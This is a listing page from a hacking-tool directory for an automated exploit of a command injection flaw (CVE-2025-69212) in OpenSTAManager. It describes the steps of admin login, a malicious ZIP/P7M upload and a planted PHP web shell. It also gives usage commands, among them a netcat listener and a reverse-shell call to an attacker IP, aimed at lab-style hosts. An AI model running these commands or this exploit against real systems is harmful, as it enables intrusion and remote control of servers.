Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-69212-Exploit — Automated exploit for CVE-2025-69212 command injection in OpenSTAManager, featuring admin authentication, malicious ZIP upload, and reverse shell or command execution. | Kitploit
Tools/GitHubGitHub/pasindu-sd/cve-2025-69212-exploit
ExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubpasindu-sd/cve-2025-69212-exploit

CVE-2025-69212-Exploit

Automated exploit for CVE-2025-69212 command injection in OpenSTAManager, featuring admin authentication, malicious ZIP upload, and reverse shell or command execution.

View Repository
4 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-69212 - OpenSTAManager P7M Command Injection Exploit

A fully automated exploit script for CVE-2025-69212, a command injection vulnerability in OpenSTAManager. This script authenticates with admin credentials, deploys a malicious PHP web shell via a crafted P7M file in a ZIP archive, and provides command execution or a reverse shell.

Features

  • Automated authentication.
  • Malicious ZIP generation and upload (invoice.p7m injection).
  • Base64 command wrapping to prevent special character issues.
  • Reverse shell and single-command execution arguments.

Usage

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -r <LHOST> <LPORT>


Examples:

Execute a single command:

```bash
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -c 'id'

Get a Reverse Shell:

root@kitploit:~
# Start your netcat listener in another terminal:
nc -lvnp 4444

# Run the exploit:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -r 10.10.14.1 4444
Download Tool